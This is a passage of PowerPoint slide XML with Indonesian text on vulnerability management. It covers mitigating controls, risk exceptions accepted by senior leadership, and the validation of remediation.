            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditingkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengecualian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pengecualian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diremediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekritisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.  Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemimpinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> senior, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didokumentasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadwal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Validasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mestinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terlepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>niat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah-masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
